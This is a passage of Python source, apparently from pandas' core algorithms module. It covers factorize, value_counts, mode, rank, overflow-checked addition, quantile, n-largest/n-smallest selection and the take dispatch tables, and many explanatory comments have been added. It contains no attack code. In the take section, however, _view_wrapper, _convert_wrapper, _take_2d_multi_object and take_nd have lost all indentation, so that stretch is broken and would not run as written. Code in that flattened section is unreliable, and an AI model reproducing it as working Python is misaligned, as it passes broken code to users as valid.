    # work-around for numpy < 1.8 and comparisions on py3
    # faster for larger cases to use np.in1d
    # default comparator: hashtable membership on objects; note the lambda
    # closes over `values` and ignores its second argument
    f = lambda x, y: htable.ismember_object(x, values)

    # GH16012
    # Ensure np.in1d doesn't get object types or it *may* throw an exception
    # NOTE precedence: the condition below reads as
    #   (_np_version_under1p8 and compat.PY3)
    #   or (len(comps) > 1000000 and not is_object_dtype(comps))
    if ((_np_version_under1p8 and compat.PY3) or len(comps) > 1000000 and
            not is_object_dtype(comps)):
        f = lambda x, y: np.in1d(x, y)
    elif is_integer_dtype(comps):
        try:
            values = values.astype('int64', copy=False)
            comps = comps.astype('int64', copy=False)
            f = lambda x, y: htable.ismember_int64(x, y)
        except (TypeError, ValueError):
            # non-castable contents: fall back to the object comparator
            values = values.astype(object)
            comps = comps.astype(object)
    elif is_float_dtype(comps):
        try:
            values = values.astype('float64', copy=False)
            comps = comps.astype('float64', copy=False)
            # checknull tells the cython routine whether NaN-aware
            # comparison is required
            checknull = isna(values).any()
            f = lambda x, y: htable.ismember_float64(x, y, checknull)
        except (TypeError, ValueError):
            values = values.astype(object)
            comps = comps.astype(object)

    return f(comps, values)
def factorize(values, sort=False, order=None, na_sentinel=-1, size_hint=None):
    """
    Encode input values as an enumerated type or categorical variable

    Parameters
    ----------
    values : ndarray (1-d)
        Sequence
    sort : boolean, default False
        Sort by values
    order : deprecated, unused
    na_sentinel : int, default -1
        Value to mark "not found"
    size_hint : hint to the hashtable sizer

    Returns
    -------
    labels : the indexer to the original array
    uniques : ndarray (1-d) or Index
        the unique values. Index is returned when passed values is Index or
        Series

    note: an array of Periods will ignore sort as it returns an always sorted
    PeriodIndex
    """
    values = _ensure_arraylike(values)
    original = values
    values, dtype, _ = _ensure_data(values)
    (hash_klass, vec_klass), values = _get_data_algo(values, _hashtables)

    table = hash_klass(size_hint or len(values))
    uniques = vec_klass()
    # integer dtypes cannot hold nulls, so the null scan can be skipped
    check_nulls = not is_integer_dtype(original)
    # get_labels fills `uniques` in order of first appearance and returns
    # per-element codes into it (na_sentinel for missing values)
    labels = table.get_labels(values, uniques, 0, na_sentinel, check_nulls)

    labels = _ensure_platform_int(labels)
    uniques = uniques.to_array()

    if sort and len(uniques) > 0:
        from pandas.core.sorting import safe_sort
        # safe_sort remaps the labels to match the sorted uniques
        uniques, labels = safe_sort(uniques, labels, na_sentinel=na_sentinel,
                                    assume_unique=True)

    uniques = _reconstruct_data(uniques, dtype, original)

    # return uniques in the caller's original container type
    if isinstance(original, ABCIndexClass):
        uniques = original._shallow_copy(uniques, name=None)
    elif isinstance(original, ABCSeries):
        from pandas import Index
        uniques = Index(uniques)

    return labels, uniques
def value_counts(values, sort=True, ascending=False, normalize=False,
                 bins=None, dropna=True):
    """
    Compute a histogram of the counts of non-null values.

    Parameters
    ----------
    values : ndarray (1-d)
    sort : boolean, default True
        Sort by values
    ascending : boolean, default False
        Sort in ascending order
    normalize: boolean, default False
        If True then compute a relative histogram
    bins : integer, optional
        Rather than count values, group them into half-open bins,
        convenience for pd.cut, only works with numeric data
    dropna : boolean, default True
        Don't include counts of NaN

    Returns
    -------
    value_counts : Series
    """
    from pandas.core.series import Series, Index
    name = getattr(values, 'name', None)

    if bins is not None:
        try:
            from pandas.core.reshape.tile import cut
            values = Series(values)
            ii = cut(values, bins, include_lowest=True)
        except TypeError:
            raise TypeError("bins argument only works with numeric data.")

        # count the binned values, drop nulls from the resulting index,
        # and normalize the index to interval dtype
        result = ii.value_counts(dropna=dropna)
        result = result[result.index.notna()]
        result.index = result.index.astype('interval')
        result = result.sort_index()

        # if we are dropna and we have NO values
        if dropna and (result.values == 0).all():
            result = result.iloc[0:0]

        # normalizing is by len of all (regardless of dropna)
        counts = np.array([len(ii)])

    else:

        if is_categorical_dtype(values) or is_sparse(values):

            # handle Categorical and sparse,
            # dispatching to the underlying values' own value_counts
            result = Series(values).values.value_counts(dropna=dropna)
            result.name = name
            counts = result.values

        else:
            keys, counts = _value_counts_arraylike(values, dropna)

            if not isinstance(keys, Index):
                keys = Index(keys)
            result = Series(counts, index=keys, name=name)

    if sort:
        result = result.sort_values(ascending=ascending)

    if normalize:
        # relative frequencies are taken against the full count `counts`,
        # not the possibly-filtered `result`
        result = result / float(counts.sum())

    return result
def _value_counts_arraylike(values, dropna):
    """
    Count the occurrences of each distinct value in ``values``.

    Parameters
    ----------
    values : arraylike
    dropna : boolean

    Returns
    -------
    (uniques, counts)
    """
    values = _ensure_arraylike(values)
    original = values
    values, dtype, ndtype = _ensure_data(values)

    if needs_i8_conversion(dtype):
        # i8: datetimelike values counted through their int64 view
        keys, counts = htable.value_count_int64(values, dropna)

        if dropna:
            # iNaT is the int64 NaT sentinel; strip it from the result
            msk = keys != iNaT
            keys, counts = keys[msk], counts[msk]

    else:
        # ndarray like

        # TODO: handle uint8
        f = getattr(htable, "value_count_{dtype}".format(dtype=ndtype))
        keys, counts = f(values, dropna)

        mask = isna(values)
        if not dropna and mask.any():
            # the hashtable may or may not have emitted a NaN key itself;
            # only prepend one (with the null count) when it did not
            if not isna(keys).any():
                keys = np.insert(keys, 0, np.NaN)
                counts = np.insert(counts, 0, mask.sum())

    keys = _reconstruct_data(keys, original.dtype, original)

    return keys, counts
def duplicated(values, keep='first'):
    """
    Return boolean ndarray denoting duplicate values.

    .. versionadded:: 0.19.0

    Parameters
    ----------
    values : ndarray-like
        Array over which to check for duplicate values.
    keep : {'first', 'last', False}, default 'first'
        - ``first`` : Mark duplicates as ``True`` except for the first
          occurrence.
        - ``last`` : Mark duplicates as ``True`` except for the last
          occurrence.
        - False : Mark all duplicates as ``True``.

    Returns
    -------
    duplicated : ndarray
    """
    # normalize to an ndarray plus its ndtype string, then dispatch to
    # the matching cython implementation
    values, dtype, ndtype = _ensure_data(values)
    dup_func = getattr(htable, "duplicated_{dtype}".format(dtype=ndtype))
    return dup_func(values, keep=keep)
def mode(values):
    """
    Returns the mode(s) of an array.

    Parameters
    ----------
    values : array-like
        Array over which to check for duplicate values.

    Returns
    -------
    mode : Series
    """
    from pandas import Series

    values = _ensure_arraylike(values)
    original = values

    # categorical is a fast-path: dispatch to Categorical.mode directly
    if is_categorical_dtype(values):
        if isinstance(values, Series):
            return Series(values.values.mode(), name=values.name)
        return values.mode()

    values, dtype, ndtype = _ensure_data(values)

    # TODO: this should support float64
    if ndtype not in ['int64', 'uint64', 'object']:
        ndtype = 'object'
        values = _ensure_object(values)

    mode_func = getattr(htable, "mode_{dtype}".format(dtype=ndtype))
    result = mode_func(values)

    try:
        result = np.sort(result)
    except TypeError as e:
        # unorderable contents: keep the hashtable ordering
        warn("Unable to sort modes: %s" % e)

    result = _reconstruct_data(result, original.dtype, original)
    return Series(result)
def rank(values, axis=0, method='average', na_option='keep',
         ascending=True, pct=False):
    """
    Rank the values along a given axis.

    Parameters
    ----------
    values : array-like
        Array whose values will be ranked. The number of dimensions in this
        array must not exceed 2.
    axis : int, default 0
        Axis over which to perform rankings.
    method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
        The method by which tiebreaks are broken during the ranking.
    na_option : {'keep', 'top'}, default 'keep'
        The method by which NaNs are placed in the ranking.
        - ``keep``: rank each NaN value with a NaN ranking
        - ``top``: replace each NaN with either +/- inf so that they
                   there are ranked at the top
    ascending : boolean, default True
        Whether or not the elements should be ranked in ascending order.
    pct : boolean, default False
        Whether or not to the display the returned rankings in integer form
        (e.g. 1, 2, 3) or in percentile form (e.g. 0.333..., 0.666..., 1).
    """
    ndim = values.ndim
    if ndim > 2:
        raise TypeError("Array with ndim > 2 are not supported.")

    if ndim == 1:
        rank_func, values = _get_data_algo(values, _rank1d_functions)
        return rank_func(values, ties_method=method, ascending=ascending,
                         na_option=na_option, pct=pct)

    # 2-d case: the cython routine additionally needs the axis
    rank_func, values = _get_data_algo(values, _rank2d_functions)
    return rank_func(values, axis=axis, ties_method=method,
                     ascending=ascending, na_option=na_option, pct=pct)
def checked_add_with_arr(arr, b, arr_mask=None, b_mask=None):
    """
    Perform array addition that checks for underflow and overflow.

    Performs the addition of an int64 array and an int64 integer (or array)
    but checks that they do not result in overflow first. For elements that
    are indicated to be NaN, whether or not there is overflow for that element
    is automatically ignored.

    Parameters
    ----------
    arr : array addend.
    b : array or scalar addend.
    arr_mask : boolean array or None
        array indicating which elements to exclude from checking
    b_mask : boolean array or boolean or None
        array or scalar indicating which element(s) to exclude from checking

    Returns
    -------
    sum : An array for elements x + b for each element x in arr if b is
          a scalar or an array for elements x + y for each element pair
          (x, y) in (arr, b).

    Raises
    ------
    OverflowError if any x + y exceeds the maximum or minimum int64 value.
    """
    def _broadcast(arr_or_scalar, shape):
        """
        Helper function to broadcast arrays / scalars to the desired shape.
        """
        if _np_version_under1p10:
            # np.broadcast_to does not exist yet: emulate it for scalars
            # and pass arrays through unchanged
            if lib.isscalar(arr_or_scalar):
                out = np.empty(shape)
                out.fill(arr_or_scalar)
            else:
                out = arr_or_scalar
        else:
            out = np.broadcast_to(arr_or_scalar, shape)
        return out

    # For performance reasons, we broadcast 'b' to the new array 'b2'
    # so that it has the same size as 'arr'.
    b2 = _broadcast(b, arr.shape)
    if b_mask is not None:
        # We do the same broadcasting for b_mask as well.
        b2_mask = _broadcast(b_mask, arr.shape)
    else:
        b2_mask = None

    # For elements that are NaN, regardless of their value, we should
    # ignore whether they overflow or not when doing the checked add.
    if arr_mask is not None and b2_mask is not None:
        not_nan = np.logical_not(arr_mask | b2_mask)
    elif arr_mask is not None:
        not_nan = np.logical_not(arr_mask)
    elif b_mask is not None:
        not_nan = np.logical_not(b2_mask)
    else:
        not_nan = np.empty(arr.shape, dtype=bool)
        not_nan.fill(True)

    # gh-14324: For each element in 'arr' and its corresponding element
    # in 'b2', we check the sign of the element in 'b2'. If it is positive,
    # we then check whether its sum with the element in 'arr' exceeds
    # np.iinfo(np.int64).max. If so, we have an overflow error. If it
    # it is negative, we then check whether its sum with the element in
    # 'arr' exceeds np.iinfo(np.int64).min. If so, we have an overflow
    # error as well.
    mask1 = b2 > 0
    mask2 = b2 < 0

    if not mask1.any():
        # every addend is <= 0, so only underflow is possible
        to_raise = ((np.iinfo(np.int64).min - b2 > arr) & not_nan).any()
    elif not mask2.any():
        # every addend is >= 0, so only overflow is possible
        to_raise = ((np.iinfo(np.int64).max - b2 < arr) & not_nan).any()
    else:
        # mixed signs: check each direction on its own subset
        to_raise = (((np.iinfo(np.int64).max -
                      b2[mask1] < arr[mask1]) & not_nan[mask1]).any() or
                    ((np.iinfo(np.int64).min -
                      b2[mask2] > arr[mask2]) & not_nan[mask2]).any())

    if to_raise:
        raise OverflowError("Overflow in int64 addition")
    return arr + b
# ndtype -> cython 1-d ranking implementation (consumed by rank() via
# _get_data_algo; 'object' doubles as the fallback entry)
_rank1d_functions = {
    'float64': algos.rank_1d_float64,
    'int64': algos.rank_1d_int64,
    'uint64': algos.rank_1d_uint64,
    'object': algos.rank_1d_object
}

# ndtype -> cython 2-d ranking implementation (same dispatch scheme)
_rank2d_functions = {
    'float64': algos.rank_2d_float64,
    'int64': algos.rank_2d_int64,
    'uint64': algos.rank_2d_uint64,
    'object': algos.rank_2d_object
}
def quantile(x, q, interpolation_method='fraction'):
    """
    Compute sample quantile or quantiles of the input array. For example, q=0.5
    computes the median.

    The `interpolation_method` parameter supports three values, namely
    `fraction` (default), `lower` and `higher`. Interpolation is done only,
    if the desired quantile lies between two data points `i` and `j`. For
    `fraction`, the result is an interpolated value between `i` and `j`;
    for `lower`, the result is `i`, for `higher` the result is `j`.

    Parameters
    ----------
    x : ndarray
        Values from which to extract score.
    q : scalar or array
        Percentile at which to extract score.
    interpolation_method : {'fraction', 'lower', 'higher'}, optional
        This optional parameter specifies the interpolation method to use,
        when the desired quantile lies between two data points `i` and `j`:

        - fraction: `i + (j - i)*fraction`, where `fraction` is the
                    fractional part of the index surrounded by `i` and `j`.
        - lower: `i`.
        - higher: `j`.

    Returns
    -------
    score : float
        Score at percentile.

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(100)
    >>> stats.scoreatpercentile(a, 50)
    49.5
    """
    x = np.asarray(x)
    mask = isna(x)

    # work only on the non-null values, in sorted order
    x = x[~mask]

    values = np.sort(x)

    def _interpolate(a, b, fraction):
        """Returns the point at the given fraction between a and b, where
        'fraction' must be between 0 and 1.
        """
        return a + (b - a) * fraction

    def _get_score(at):
        # quantile of an empty array is NA
        if len(values) == 0:
            return np.nan

        idx = at * (len(values) - 1)
        if idx % 1 == 0:
            score = values[int(idx)]
        else:
            if interpolation_method == 'fraction':
                score = _interpolate(values[int(idx)], values[int(idx) + 1],
                                     idx % 1)
            elif interpolation_method == 'lower':
                # BUG FIX: np.floor/np.ceil return floats; indexing an
                # ndarray with a float raises IndexError on numpy >= 1.12,
                # so cast to int explicitly
                score = values[int(np.floor(idx))]
            elif interpolation_method == 'higher':
                score = values[int(np.ceil(idx))]
            else:
                raise ValueError("interpolation_method can only be "
                                 "'fraction', 'lower' or 'higher'")

        return score

    if is_scalar(q):
        return _get_score(q)
    else:
        q = np.asarray(q, np.float64)
        return algos.arrmap_float64(q, _get_score)
# --------------- #
# select n #
# --------------- #
class SelectN(object):
    """
    Base class for the n-largest / n-smallest selection machinery.

    Subclasses must implement ``compute(method)``; ``nlargest`` and
    ``nsmallest`` simply dispatch to it.
    """

    def __init__(self, obj, n, keep):
        self.obj = obj
        self.n = n
        self.keep = keep

        # only these two tie-keeping policies are supported
        if self.keep not in ('first', 'last'):
            raise ValueError('keep must be either "first", "last"')

    def nlargest(self):
        return self.compute('nlargest')

    def nsmallest(self):
        return self.compute('nsmallest')

    @staticmethod
    def is_valid_dtype_n_method(dtype):
        """
        Helper function to determine if dtype is valid for
        nsmallest/nlargest methods
        """
        # real numeric dtypes and datetimelike (i8-convertible) dtypes
        # are orderable; complex numbers are not
        if is_numeric_dtype(dtype):
            return not is_complex_dtype(dtype)
        return needs_i8_conversion(dtype)
class SelectNSeries(SelectN):
    """
    Implement n largest/smallest for Series

    Parameters
    ----------
    obj : Series
    n : int
    keep : {'first', 'last'}, default 'first'

    Returns
    -------
    nordered : Series
    """

    def compute(self, method):
        # method is 'nlargest' or 'nsmallest'
        n = self.n
        dtype = self.obj.dtype
        if not self.is_valid_dtype_n_method(dtype):
            raise TypeError("Cannot use method '{method}' with "
                            "dtype {dtype}".format(method=method,
                                                   dtype=dtype))

        # n <= 0 selects nothing
        if n <= 0:
            return self.obj[[]]

        dropped = self.obj.dropna()

        # slow method
        if n >= len(self.obj):
            # asking for at least everything: a full sort is good enough
            reverse_it = (self.keep == 'last' or method == 'nlargest')
            ascending = method == 'nsmallest'
            slc = np.s_[::-1] if reverse_it else np.s_[:]
            return dropped[slc].sort_values(ascending=ascending).head(n)

        # fast method
        arr, _, _ = _ensure_data(dropped.values)
        if method == 'nlargest':
            # negate so that nlargest reduces to nsmallest
            arr = -arr

        if self.keep == 'last':
            # reverse so that later duplicates win the <= comparison below
            arr = arr[::-1]

        narr = len(arr)
        n = min(n, narr)

        # partial-selection: find the n-th smallest value, then gather
        # everything at or below it
        kth_val = algos.kth_smallest(arr.copy(), n - 1)
        ns, = np.nonzero(arr <= kth_val)
        # mergesort is stable, preserving original order among ties
        inds = ns[arr[ns].argsort(kind='mergesort')][:n]
        if self.keep == 'last':
            # reverse indices back into the original (unreversed) frame
            inds = narr - 1 - inds
        return dropped.iloc[inds]
class SelectNFrame(SelectN):
    """
    Implement n largest/smallest for DataFrame

    Parameters
    ----------
    obj : DataFrame
    n : int
    keep : {'first', 'last'}, default 'first'
    columns : list or str

    Returns
    -------
    nordered : DataFrame
    """

    def __init__(self, obj, n, keep, columns):
        super(SelectNFrame, self).__init__(obj, n, keep)
        # normalize `columns` to a list of column labels
        if not is_list_like(columns):
            columns = [columns]
        columns = list(columns)
        self.columns = columns

    def compute(self, method):
        # method is 'nlargest' or 'nsmallest'

        from pandas import Int64Index
        n = self.n
        frame = self.obj
        columns = self.columns

        # validate every requested column up front
        for column in columns:
            dtype = frame[column].dtype
            if not self.is_valid_dtype_n_method(dtype):
                raise TypeError((
                    "Column {column!r} has dtype {dtype}, cannot use method "
                    "{method!r} with this dtype"
                ).format(column=column, dtype=dtype, method=method))

        def get_indexer(current_indexer, other_indexer):
            """Helper function to concat `current_indexer` and `other_indexer`
            depending on `method`
            """
            if method == 'nsmallest':
                return current_indexer.append(other_indexer)
            else:
                return other_indexer.append(current_indexer)

        # Below we save and reset the index in case index contains duplicates
        original_index = frame.index
        cur_frame = frame = frame.reset_index(drop=True)
        cur_n = n
        indexer = Int64Index([])

        for i, column in enumerate(columns):

            # For each column we apply method to cur_frame[column].
            # If it is the last column in columns, or if the values
            # returned are unique in frame[column] we save this index
            # and break
            # Otherwise we must save the index of the non duplicated values
            # and set the next cur_frame to cur_frame filtered on all
            # duplicated values (#GH15297)
            series = cur_frame[column]
            values = getattr(series, method)(cur_n, keep=self.keep)
            is_last_column = len(columns) - 1 == i
            if is_last_column or values.nunique() == series.isin(values).sum():

                # Last column in columns or values are unique in
                # series => values
                # is all that matters
                indexer = get_indexer(indexer, values.index)
                break

            # split the selection into ties (duplicated) and non-ties;
            # non-ties are final, ties must be re-ranked by the next column
            duplicated_filter = series.duplicated(keep=False)
            duplicated = values[duplicated_filter]
            non_duplicated = values[~duplicated_filter]
            indexer = get_indexer(indexer, non_duplicated.index)

            # Must set cur frame to include all duplicated values
            # to consider for the next column, we also can reduce
            # cur_n by the current length of the indexer
            cur_frame = cur_frame[series.isin(duplicated)]
            cur_n = n - len(indexer)

        frame = frame.take(indexer)

        # Restore the index on frame
        frame.index = original_index.take(indexer)
        return frame
# ---- #
# take #
# ---- #
def _view_wrapper(f, arr_dtype=None, out_dtype=None, fill_wrap=None):
def wrapper(arr, indexer, out, fill_value=np.nan):
if arr_dtype is not None:
arr = arr.view(arr_dtype)
if out_dtype is not None:
out = out.view(out_dtype)
if fill_wrap is not None:
fill_value = fill_wrap(fill_value)
f(arr, indexer, out, fill_value=fill_value)
return wrapper
def _convert_wrapper(f, conv_dtype):
def wrapper(arr, indexer, out, fill_value=np.nan):
arr = arr.astype(conv_dtype)
f(arr, indexer, out, fill_value=fill_value)
return wrapper
def _take_2d_multi_object(arr, indexer, out, fill_value, mask_info):
# this is not ideal, performance-wise, but it's better than raising
# an exception (best to optimize in Cython to avoid getting here)
row_idx, col_idx = indexer
if mask_info is not None:
(row_mask, col_mask), (row_needs, col_needs) = mask_info
else:
row_mask = row_idx == -1
col_mask = col_idx == -1
row_needs = row_mask.any()
col_needs = col_mask.any()
if fill_value is not None:
if row_needs:
out[row_mask, :] = fill_value
if col_needs:
out[:, col_mask] = fill_value
for i in range(len(row_idx)):
u_ = row_idx[i]
for j in range(len(col_idx)):
v = col_idx[j]
out[i, j] = arr[u_, v]
def _take_nd_object(arr, indexer, out, axis, fill_value, mask_info):
    """
    Generic fallback take along ``axis`` into ``out``; positions where
    ``indexer`` is -1 are filled with ``fill_value``.
    """
    if mask_info is not None:
        mask, needs_masking = mask_info
    else:
        mask = indexer == -1
        needs_masking = mask.any()

    if arr.dtype != out.dtype:
        arr = arr.astype(out.dtype)

    # an empty axis has nothing to gather; only the fill step applies
    if arr.shape[axis] > 0:
        arr.take(_ensure_platform_int(indexer), axis=axis, out=out)

    if needs_masking:
        # select the masked positions along `axis` only
        fill_slices = [slice(None)] * arr.ndim
        fill_slices[axis] = mask
        out[tuple(fill_slices)] = fill_value
# (arr dtype name, out dtype name) -> specialized cython 1-d take;
# bool/datetime entries go through _view_wrapper to reuse the int
# implementations on a reinterpreted view
_take_1d_dict = {
    ('int8', 'int8'): algos.take_1d_int8_int8,
    ('int8', 'int32'): algos.take_1d_int8_int32,
    ('int8', 'int64'): algos.take_1d_int8_int64,
    ('int8', 'float64'): algos.take_1d_int8_float64,
    ('int16', 'int16'): algos.take_1d_int16_int16,
    ('int16', 'int32'): algos.take_1d_int16_int32,
    ('int16', 'int64'): algos.take_1d_int16_int64,
    ('int16', 'float64'): algos.take_1d_int16_float64,
    ('int32', 'int32'): algos.take_1d_int32_int32,
    ('int32', 'int64'): algos.take_1d_int32_int64,
    ('int32', 'float64'): algos.take_1d_int32_float64,
    ('int64', 'int64'): algos.take_1d_int64_int64,
    ('int64', 'float64'): algos.take_1d_int64_float64,
    ('float32', 'float32'): algos.take_1d_float32_float32,
    ('float32', 'float64'): algos.take_1d_float32_float64,
    ('float64', 'float64'): algos.take_1d_float64_float64,
    ('object', 'object'): algos.take_1d_object_object,
    ('bool', 'bool'): _view_wrapper(algos.take_1d_bool_bool, np.uint8,
                                    np.uint8),
    ('bool', 'object'): _view_wrapper(algos.take_1d_bool_object, np.uint8,
                                      None),
    # NOTE: the final np.int64 is passed positionally here and lands on
    # fill_wrap (elsewhere it is spelled fill_wrap=np.int64)
    ('datetime64[ns]', 'datetime64[ns]'): _view_wrapper(
        algos.take_1d_int64_int64, np.int64, np.int64, np.int64)
}

# same mapping for 2-d take along axis 0
_take_2d_axis0_dict = {
    ('int8', 'int8'): algos.take_2d_axis0_int8_int8,
    ('int8', 'int32'): algos.take_2d_axis0_int8_int32,
    ('int8', 'int64'): algos.take_2d_axis0_int8_int64,
    ('int8', 'float64'): algos.take_2d_axis0_int8_float64,
    ('int16', 'int16'): algos.take_2d_axis0_int16_int16,
    ('int16', 'int32'): algos.take_2d_axis0_int16_int32,
    ('int16', 'int64'): algos.take_2d_axis0_int16_int64,
    ('int16', 'float64'): algos.take_2d_axis0_int16_float64,
    ('int32', 'int32'): algos.take_2d_axis0_int32_int32,
    ('int32', 'int64'): algos.take_2d_axis0_int32_int64,
    ('int32', 'float64'): algos.take_2d_axis0_int32_float64,
    ('int64', 'int64'): algos.take_2d_axis0_int64_int64,
    ('int64', 'float64'): algos.take_2d_axis0_int64_float64,
    ('float32', 'float32'): algos.take_2d_axis0_float32_float32,
    ('float32', 'float64'): algos.take_2d_axis0_float32_float64,
    ('float64', 'float64'): algos.take_2d_axis0_float64_float64,
    ('object', 'object'): algos.take_2d_axis0_object_object,
    ('bool', 'bool'): _view_wrapper(algos.take_2d_axis0_bool_bool, np.uint8,
                                    np.uint8),
    ('bool', 'object'): _view_wrapper(algos.take_2d_axis0_bool_object,
                                      np.uint8, None),
    ('datetime64[ns]', 'datetime64[ns]'):
    _view_wrapper(algos.take_2d_axis0_int64_int64, np.int64, np.int64,
                  fill_wrap=np.int64)
}

# same mapping for 2-d take along axis 1
_take_2d_axis1_dict = {
    ('int8', 'int8'): algos.take_2d_axis1_int8_int8,
    ('int8', 'int32'): algos.take_2d_axis1_int8_int32,
    ('int8', 'int64'): algos.take_2d_axis1_int8_int64,
    ('int8', 'float64'): algos.take_2d_axis1_int8_float64,
    ('int16', 'int16'): algos.take_2d_axis1_int16_int16,
    ('int16', 'int32'): algos.take_2d_axis1_int16_int32,
    ('int16', 'int64'): algos.take_2d_axis1_int16_int64,
    ('int16', 'float64'): algos.take_2d_axis1_int16_float64,
    ('int32', 'int32'): algos.take_2d_axis1_int32_int32,
    ('int32', 'int64'): algos.take_2d_axis1_int32_int64,
    ('int32', 'float64'): algos.take_2d_axis1_int32_float64,
    ('int64', 'int64'): algos.take_2d_axis1_int64_int64,
    ('int64', 'float64'): algos.take_2d_axis1_int64_float64,
    ('float32', 'float32'): algos.take_2d_axis1_float32_float32,
    ('float32', 'float64'): algos.take_2d_axis1_float32_float64,
    ('float64', 'float64'): algos.take_2d_axis1_float64_float64,
    ('object', 'object'): algos.take_2d_axis1_object_object,
    ('bool', 'bool'): _view_wrapper(algos.take_2d_axis1_bool_bool, np.uint8,
                                    np.uint8),
    ('bool', 'object'): _view_wrapper(algos.take_2d_axis1_bool_object,
                                      np.uint8, None),
    ('datetime64[ns]', 'datetime64[ns]'):
    _view_wrapper(algos.take_2d_axis1_int64_int64, np.int64, np.int64,
                  fill_wrap=np.int64)
}

# same mapping for simultaneous row+column (multi) take
_take_2d_multi_dict = {
    ('int8', 'int8'): algos.take_2d_multi_int8_int8,
    ('int8', 'int32'): algos.take_2d_multi_int8_int32,
    ('int8', 'int64'): algos.take_2d_multi_int8_int64,
    ('int8', 'float64'): algos.take_2d_multi_int8_float64,
    ('int16', 'int16'): algos.take_2d_multi_int16_int16,
    ('int16', 'int32'): algos.take_2d_multi_int16_int32,
    ('int16', 'int64'): algos.take_2d_multi_int16_int64,
    ('int16', 'float64'): algos.take_2d_multi_int16_float64,
    ('int32', 'int32'): algos.take_2d_multi_int32_int32,
    ('int32', 'int64'): algos.take_2d_multi_int32_int64,
    ('int32', 'float64'): algos.take_2d_multi_int32_float64,
    ('int64', 'int64'): algos.take_2d_multi_int64_int64,
    ('int64', 'float64'): algos.take_2d_multi_int64_float64,
    ('float32', 'float32'): algos.take_2d_multi_float32_float32,
    ('float32', 'float64'): algos.take_2d_multi_float32_float64,
    ('float64', 'float64'): algos.take_2d_multi_float64_float64,
    ('object', 'object'): algos.take_2d_multi_object_object,
    ('bool', 'bool'): _view_wrapper(algos.take_2d_multi_bool_bool, np.uint8,
                                    np.uint8),
    ('bool', 'object'): _view_wrapper(algos.take_2d_multi_bool_object,
                                      np.uint8, None),
    ('datetime64[ns]', 'datetime64[ns]'):
    _view_wrapper(algos.take_2d_multi_int64_int64, np.int64, np.int64,
                  fill_wrap=np.int64)
}
def _get_take_nd_function(ndim, arr_dtype, out_dtype, axis=0, mask_info=None):
    """
    Return a take implementation for the given dimensionality and dtypes.

    Lookup order: exact (arr_dtype, out_dtype) match; then a same-dtype
    implementation on out_dtype wrapped in an astype conversion; finally
    the generic object-path _take_nd_object.
    """
    if ndim <= 2:
        # first try an exact (arr dtype, out dtype) specialization
        tup = (arr_dtype.name, out_dtype.name)
        if ndim == 1:
            func = _take_1d_dict.get(tup, None)
        elif ndim == 2:
            if axis == 0:
                func = _take_2d_axis0_dict.get(tup, None)
            else:
                func = _take_2d_axis1_dict.get(tup, None)
        if func is not None:
            return func

        # fall back to the out-dtype implementation, converting arr first
        tup = (out_dtype.name, out_dtype.name)
        if ndim == 1:
            func = _take_1d_dict.get(tup, None)
        elif ndim == 2:
            if axis == 0:
                func = _take_2d_axis0_dict.get(tup, None)
            else:
                func = _take_2d_axis1_dict.get(tup, None)
        if func is not None:
            func = _convert_wrapper(func, out_dtype)
            return func

    # last resort: the pure-python/object fallback
    def func(arr, indexer, out, fill_value=np.nan):
        indexer = _ensure_int64(indexer)
        _take_nd_object(arr, indexer, out, axis=axis, fill_value=fill_value,
                        mask_info=mask_info)
    return func
def take_nd(arr, indexer, axis=0, out=None, fill_value=np.nan, mask_info=None,
allow_fill=True):
"""
Specialized Cython take which sets NaN values in one pass
Parameters
----------
arr : ndarray
Input array
indexer : ndarray
1-D array of indices to take, subarrays corresponding to -1 value
indicies are filed with fill_value
axis : int, default 0
Axis to take from
out : ndarray or None, default None
Optional output array, must be appropriate type to hold input and
fill_value together, if indexer has any -1 value entries; call
_maybe_promote to determine this type for any fill_value
fill_value : any, default np.nan
Fill value to replace -1 values with
mask_info : tuple of (ndarray, boolean)
If provided, value should correspond to:
(indexer != -1, (indexer != -1).any())
If not provided, it will be computed internally if necessary
allow_fill : boolean, default True
If False, indexer is assumed to contain no -1 values so no filling
will be done. This short-circuits computation of a mask. Result is
undefined if allow_fill == False and -1 is present in indexer.
"""
# dispatch to internal type takes
if is_categorical(arr):
return arr.take_nd(indexer, fill_value=fill_value,
allow_fill=allow_fill)
elif is_datetimetz(arr):
return arr.take(indexer, fill_value=fill_value, allow_fill=allow_fill)
elif is_interval_dtype(arr):
return arr.take(indexer, fill_value=fill_value, allow_fill=allow_fill)
if indexer is None:
indexer = np.arange(arr.shape[axis], dtype=np.int64)
dtype, fill_value = arr.dtype, arr.dtype.type()
else:
indexer = _ensure_int64(indexer, copy=False)
if not allow_fill:
dtype, fill_value = arr.dtype, arr.dtype.type()
mask_info = None, False
else:
# check for promotion based on types only (do this first because
# it's faster than computing a mask)
dtype, fill_value = maybe_promote(arr.dtype, fill_value)
if dtype != arr.dtype and (out is None or out.dtype != dtype):
# check if promotion is actually required based on indexer
if mask_info is not None:
mask, needs_masking = mask_info
else:
mask = indexer == -1
needs_masking = mask.any()
mask_info = mask, needs_masking
if needs_masking:
if out is not None and out.dtype != dtype:
raise TypeError('Incompatible type for fill_value')
else:
# if not, then depromote, set fill_value to dummy
# (it won't be used but we don't want the cython code
# to crash when trying to cast it to dtype)
dtype, fill_value = arr.dtype, arr.dtype.type()
flip_order = False
if arr.ndim == 2:
if arr.flags.f_contiguous:
flip_order = True
if flip_order:
arr = arr.T
axis = arr.ndim - axis - 1
if out is not None:
out = out.T
# at this point, it's guaranteed that dtype can hold both the arr values
# and the fill_value
if out is None:
out_shape = list(arr.shape)
out_shape[axis] = len(indexer)
out_shape = tuple(out_shape)
if arr.flags.f_contiguous and axis == arr.ndim - 1:
# minor tweak that can make an order-of-magnitude difference
# for dataframes initialized directly from 2-d ndarrays
# (s.t. df.values is c-contiguous and df._data.blocks[0] is its
# f-contiguous transpose)
out = np.empty(out_shape, dtype=dtype, order='F')
else:
out = np.empty(out_shape, dtype=dtype)
func = _get_take_nd_function(arr.ndim, arr.dtype, out.dtype, axis=axis,
mask_info=mask_info)
func(arr, indexer, out, fill_value)
if flip_order:
out = out.T
return out
take_1d = take_nd  # Convenience alias: the 1-D case is handled by the generic take_nd.
def take_2d_multi(arr, indexer, out=None, fill_value=np.nan, mask_info=None,
                  allow_fill=True):
    """
    Specialized Cython take which sets NaN values in one pass

    Takes rows ``indexer[0]`` and columns ``indexer[1]`` from the 2-D array
    ``arr`` in one pass, writing ``fill_value`` wherever an index is -1.

    Parameters
    ----------
    arr : ndarray (2-d)
    indexer : tuple of (row_idx, col_idx) or None
